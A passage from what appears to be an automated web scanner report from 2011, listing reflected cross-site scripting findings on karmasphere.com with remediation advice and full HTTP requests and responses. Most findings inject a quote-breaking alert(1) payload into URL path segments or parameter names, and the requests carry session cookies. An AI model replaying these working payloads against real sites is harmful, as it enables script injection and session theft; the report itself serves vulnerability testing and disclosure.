Cookie: 9a99d17bd50953aeb8a9e7667440422a=f89b9d074c6917940e1ca4ab49878bf2; __utmz=213720718.1296478383.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; wp=BYBDDDDDDTTHTCX; __utma=213720718.1463850642.1296478383.1296478383.1296478383.1; _mkto_trk=id:294-XKZ-927&token:_mch-karmasphere.com-1296478390295-69233; _jsuid=236660194602537908; __utmc=213720718; __utmb=213720718.6.10.1296478383;
Response
HTTP/1.1 404 NOT FOUND
Date: Tue, 01 Feb 2011 03:03:16 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.15
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Tue, 01 Feb 2011 03:03:17 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 34722
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > ...[SNIP]... <= solution) { var url='http://karmasphere.com/components/com_stalytics2/trackHeat.php'; var data = 'url=http://karmasphere.com/In-The-News/474d7';alert(1)//5a22ddb751a&title=__404__&x='+clickX+'&y='+clickY+'&solution='+solution+'&itemid='+itemid; hm_sendClickAjaxReq(url, data); } // true zurckgeben, damit das Event weiterverarbeitet wird return tru ...[SNIP]...
3.42. http://karmasphere.com/In-The-News/hadoop-basics-and-development-with-karmasphere.html [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 10aab'%3balert(1)//f604f148574 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 10aab';alert(1)//f604f148574 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /In-The-News/hadoop-basics-and-development-with-karmasphere.html?10aab'%3balert(1)//f604f148574=1 HTTP/1.1
Host: karmasphere.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 9a99d17bd50953aeb8a9e7667440422a=f89b9d074c6917940e1ca4ab49878bf2; __utmz=213720718.1296478383.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; wp=BYBDDDDDDTTHTCX; __utma=213720718.1463850642.1296478383.1296478383.1296478383.1; _mkto_trk=id:294-XKZ-927&token:_mch-karmasphere.com-1296478390295-69233; _jsuid=236660194602537908; __utmc=213720718; __utmb=213720718.6.10.1296478383;
Response
HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 03:01:48 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.15
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Tue, 01 Feb 2011 03:01:48 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 30812
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > ...[SNIP]... <10aab';alert(1)//f604f148574=1&title=TechRepublic: Hadoop Basics and Development with Karmasphere&x='+clickX+'&y='+clickY+'&solution='+solution+'&itemid='+itemid; hm_sendClickAjaxReq(url, data); } // true zurckgeben ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1655c'%3balert(1)//0ea52dad714 was submitted in the REST URL parameter 1. This input was echoed as 1655c';alert(1)//0ea52dad714 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Miscellaneous1655c'%3balert(1)//0ea52dad714/management.html HTTP/1.1
Host: karmasphere.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 9a99d17bd50953aeb8a9e7667440422a=f89b9d074c6917940e1ca4ab49878bf2; __utmz=213720718.1296478383.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; wp=BYBDDDDDDTTHTCX; __utma=213720718.1463850642.1296478383.1296478383.1296478383.1; _mkto_trk=id:294-XKZ-927&token:_mch-karmasphere.com-1296478390295-69233; _jsuid=236660194602537908; __utmc=213720718; __utmb=213720718.6.10.1296478383;
Response
HTTP/1.1 404 NOT FOUND
Date: Tue, 01 Feb 2011 03:02:43 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.15
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Tue, 01 Feb 2011 03:02:44 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 34756
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > ...[SNIP]... <= solution) { var url='http://karmasphere.com/components/com_stalytics2/trackHeat.php'; var data = 'url=http://karmasphere.com/Miscellaneous1655c';alert(1)//0ea52dad714/management.html&title=__404__&x='+clickX+'&y='+clickY+'&solution='+solution+'&itemid='+itemid; hm_sendClickAjaxReq(url, data); } // true zurckgeben, damit das Event weiterverarbeitet wir ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6664b'%3balert(1)//06705144e9d was submitted in the REST URL parameter 2. This input was echoed as 6664b';alert(1)//06705144e9d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Miscellaneous/6664b'%3balert(1)//06705144e9d HTTP/1.1
Host: karmasphere.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 9a99d17bd50953aeb8a9e7667440422a=f89b9d074c6917940e1ca4ab49878bf2; __utmz=213720718.1296478383.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; wp=BYBDDDDDDTTHTCX; __utma=213720718.1463850642.1296478383.1296478383.1296478383.1; _mkto_trk=id:294-XKZ-927&token:_mch-karmasphere.com-1296478390295-69233; _jsuid=236660194602537908; __utmc=213720718; __utmb=213720718.6.10.1296478383;
Response
HTTP/1.1 404 NOT FOUND
Date: Tue, 01 Feb 2011 03:03:38 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.15
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Tue, 01 Feb 2011 03:03:38 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 34726
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > ...[SNIP]... <= solution) { var url='http://karmasphere.com/components/com_stalytics2/trackHeat.php'; var data = 'url=http://karmasphere.com/Miscellaneous/6664b';alert(1)//06705144e9d&title=__404__&x='+clickX+'&y='+clickY+'&solution='+solution+'&itemid='+itemid; hm_sendClickAjaxReq(url, data); } // true zurckgeben, damit das Event weiterverarbeitet wird return tru ...[SNIP]...
3.45. http://karmasphere.com/Miscellaneous/management.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://karmasphere.com
Path: /Miscellaneous/management.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71aba'%3balert(1)//5706c1c30c3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 71aba';alert(1)//5706c1c30c3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Miscellaneous/management.html?71aba'%3balert(1)//5706c1c30c3=1 HTTP/1.1
Host: karmasphere.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 9a99d17bd50953aeb8a9e7667440422a=f89b9d074c6917940e1ca4ab49878bf2; __utmz=213720718.1296478383.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; wp=BYBDDDDDDTTHTCX; __utma=213720718.1463850642.1296478383.1296478383.1296478383.1; _mkto_trk=id:294-XKZ-927&token:_mch-karmasphere.com-1296478390295-69233; _jsuid=236660194602537908; __utmc=213720718; __utmb=213720718.6.10.1296478383;
Response
HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 03:02:10 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.15
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Tue, 01 Feb 2011 03:02:11 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33369
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > ...[SNIP]... <71aba';alert(1)//5706c1c30c3=1&title=Big Data Intelligence from Karmasphere | Management&x='+clickX+'&y='+clickY+'&solution='+solution+'&itemid='+itemid; hm_sendClickAjaxReq(url, data); } // true zurckgeben, damit d ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2d183'%3balert(1)//c6211ba5095 was submitted in the REST URL parameter 2. This input was echoed as 2d183';alert(1)//c6211ba5095 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Miscellaneous/2d183'%3balert(1)//c6211ba5095 HTTP/1.1
Host: karmasphere.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 9a99d17bd50953aeb8a9e7667440422a=f89b9d074c6917940e1ca4ab49878bf2; __utmz=213720718.1296478383.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; wp=BYBDDDDDDTTHTCX; __utma=213720718.1463850642.1296478383.1296478383.1296478383.1; _mkto_trk=id:294-XKZ-927&token:_mch-karmasphere.com-1296478390295-69233; _jsuid=236660194602537908; __utmc=213720718; __utmb=213720718.6.10.1296478383;
Response
HTTP/1.1 404 NOT FOUND
Date: Tue, 01 Feb 2011 03:01:59 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.15
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Tue, 01 Feb 2011 03:02:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 34726
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > ...[SNIP]... <= solution) { var url='http://karmasphere.com/components/com_stalytics2/trackHeat.php'; var data = 'url=http://karmasphere.com/Miscellaneous/2d183';alert(1)//c6211ba5095&title=__404__&x='+clickX+'&y='+clickY+'&solution='+solution+'&itemid='+itemid; hm_sendClickAjaxReq(url, data); } // true zurckgeben, damit das Event weiterverarbeitet wird return tru ...[SNIP]...
3.47. http://karmasphere.com/Miscellaneous/overview.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://karmasphere.com
Path: /Miscellaneous/overview.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cd187'%3balert(1)//73f6d1c6f6b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cd187';alert(1)//73f6d1c6f6b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Miscellaneous/overview.html?cd187'%3balert(1)//73f6d1c6f6b=1 HTTP/1.1
Host: karmasphere.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 9a99d17bd50953aeb8a9e7667440422a=f89b9d074c6917940e1ca4ab49878bf2; __utmz=213720718.1296478383.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; wp=BYBDDDDDDTTHTCX; __utma=213720718.1463850642.1296478383.1296478383.1296478383.1; _mkto_trk=id:294-XKZ-927&token:_mch-karmasphere.com-1296478390295-69233; _jsuid=236660194602537908; __utmc=213720718; __utmb=213720718.6.10.1296478383;
Response
HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 03:00:05 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.15
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Tue, 01 Feb 2011 03:00:05 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 29010
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > ...[SNIP]... <cd187';alert(1)//73f6d1c6f6b=1&title=Big Data Intelligence Software for Developers & Analysts | Karmasphere&x='+clickX+'&y='+clickY+'&solution='+solution+'&itemid='+itemid; hm_sendClickAjaxReq(url, data); } // true ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 92c2c'%3balert(1)//3cbca78891b was submitted in the REST URL parameter 1. This input was echoed as 92c2c';alert(1)//3cbca78891b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Partners92c2c'%3balert(1)//3cbca78891b/partners-page.html HTTP/1.1
Host: karmasphere.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 9a99d17bd50953aeb8a9e7667440422a=f89b9d074c6917940e1ca4ab49878bf2; __utmz=213720718.1296478383.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; wp=BYBDDDDDDTTHTCX; __utma=213720718.1463850642.1296478383.1296478383.1296478383.1; _mkto_trk=id:294-XKZ-927&token:_mch-karmasphere.com-1296478390295-69233; _jsuid=236660194602537908; __utmc=213720718; __utmb=213720718.6.10.1296478383;
Response
HTTP/1.1 404 NOT FOUND
Date: Tue, 01 Feb 2011 03:01:28 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.15
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Tue, 01 Feb 2011 03:01:28 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 34752
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > ...[SNIP]... <= solution) { var url='http://karmasphere.com/components/com_stalytics2/trackHeat.php'; var data = 'url=http://karmasphere.com/Partners92c2c';alert(1)//3cbca78891b/partners-page.html&title=__404__&x='+clickX+'&y='+clickY+'&solution='+solution+'&itemid='+itemid; hm_sendClickAjaxReq(url, data); } // true zurckgeben, damit das Event weiterverarbeitet ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9d284'%3balert(1)//24c673d15f6 was submitted in the REST URL parameter 2. This input was echoed as 9d284';alert(1)//24c673d15f6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Partners/9d284'%3balert(1)//24c673d15f6 HTTP/1.1
Host: karmasphere.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 9a99d17bd50953aeb8a9e7667440422a=f89b9d074c6917940e1ca4ab49878bf2; __utmz=213720718.1296478383.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; wp=BYBDDDDDDTTHTCX; __utma=213720718.1463850642.1296478383.1296478383.1296478383.1; _mkto_trk=id:294-XKZ-927&token:_mch-karmasphere.com-1296478390295-69233; _jsuid=236660194602537908; __utmc=213720718; __utmb=213720718.6.10.1296478383;
Response
HTTP/1.1 404 NOT FOUND
Date: Tue, 01 Feb 2011 03:02:22 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.15
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Tue, 01 Feb 2011 03:02:22 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 34716
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > ...[SNIP]... <= solution) { var url='http://karmasphere.com/components/com_stalytics2/trackHeat.php'; var data = 'url=http://karmasphere.com/Partners/9d284';alert(1)//24c673d15f6&title=__404__&x='+clickX+'&y='+clickY+'&solution='+solution+'&itemid='+itemid; hm_sendClickAjaxReq(url, data); } // true zurckgeben, damit das Event weiterverarbeitet wird return tru ...[SNIP]...
3.50. http://karmasphere.com/Partners/partners-page.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://karmasphere.com
Path: /Partners/partners-page.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ee372'%3balert(1)//2a8ec03238d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ee372';alert(1)//2a8ec03238d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Partners/partners-page.html?ee372'%3balert(1)//2a8ec03238d=1 HTTP/1.1
Host: karmasphere.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 9a99d17bd50953aeb8a9e7667440422a=f89b9d074c6917940e1ca4ab49878bf2; __utmz=213720718.1296478383.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; wp=BYBDDDDDDTTHTCX; __utma=213720718.1463850642.1296478383.1296478383.1296478383.1; _mkto_trk=id:294-XKZ-927&token:_mch-karmasphere.com-1296478390295-69233; _jsuid=236660194602537908; __utmc=213720718; __utmb=213720718.6.10.1296478383;
Response
HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 03:00:24 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.15
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Tue, 01 Feb 2011 03:00:25 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 27666
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > ...[SNIP]... <ee372';alert(1)//2a8ec03238d=1&title=Partners&x='+clickX+'&y='+clickY+'&solution='+solution+'&itemid='+itemid; hm_sendClickAjaxReq(url, data); } // true zurckgeben, damit das Event weiterverarbeitet wird return ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3977a'%3balert(1)//65b9326783f was submitted in the REST URL parameter 1. This input was echoed as 3977a';alert(1)//65b9326783f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Products-Information3977a'%3balert(1)//65b9326783f/karmasphere-analyst.html HTTP/1.1
Host: karmasphere.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 9a99d17bd50953aeb8a9e7667440422a=f89b9d074c6917940e1ca4ab49878bf2; __utmz=213720718.1296478383.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; wp=BYBDDDDDDTTHTCX; __utma=213720718.1463850642.1296478383.1296478383.1296478383.1; _mkto_trk=id:294-XKZ-927&token:_mch-karmasphere.com-1296478390295-69233; _jsuid=236660194602537908; __utmc=213720718; __utmb=213720718.6.10.1296478383;
Response
HTTP/1.1 404 NOT FOUND
Date: Tue, 01 Feb 2011 02:57:57 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.15
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Tue, 01 Feb 2011 02:57:58 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 34788
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > ...[SNIP]... <= solution) { var url='http://karmasphere.com/components/com_stalytics2/trackHeat.php'; var data = 'url=http://karmasphere.com/Products-Information3977a';alert(1)//65b9326783f/karmasphere-analyst.html&title=__404__&x='+clickX+'&y='+clickY+'&solution='+solution+'&itemid='+itemid; hm_sendClickAjaxReq(url, data); } // true zurckgeben, damit das Event weiterverarb ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 25464'%3balert(1)//eeb061c5382 was submitted in the REST URL parameter 2. This input was echoed as 25464';alert(1)//eeb061c5382 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Products-Information/25464'%3balert(1)//eeb061c5382 HTTP/1.1
Host: karmasphere.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 9a99d17bd50953aeb8a9e7667440422a=f89b9d074c6917940e1ca4ab49878bf2; __utmz=213720718.1296478383.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; wp=BYBDDDDDDTTHTCX; __utma=213720718.1463850642.1296478383.1296478383.1296478383.1; _mkto_trk=id:294-XKZ-927&token:_mch-karmasphere.com-1296478390295-69233; _jsuid=236660194602537908; __utmc=213720718; __utmb=213720718.6.10.1296478383;
Response
HTTP/1.1 404 NOT FOUND
Date: Tue, 01 Feb 2011 02:59:22 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.15
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Tue, 01 Feb 2011 02:59:23 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 34740
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > ...[SNIP]... <= solution) { var url='http://karmasphere.com/components/com_stalytics2/trackHeat.php'; var data = 'url=http://karmasphere.com/Products-Information/25464';alert(1)//eeb061c5382&title=__404__&x='+clickX+'&y='+clickY+'&solution='+solution+'&itemid='+itemid; hm_sendClickAjaxReq(url, data); } // true zurckgeben, damit das Event weiterverarbeitet wird return tru ...[SNIP]...
3.53. http://karmasphere.com/Products-Information/karmasphere-analyst.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://karmasphere.com
Path: /Products-Information/karmasphere-analyst.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 19636'%3balert(1)//83cc3c5973a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 19636';alert(1)//83cc3c5973a in the application's response.
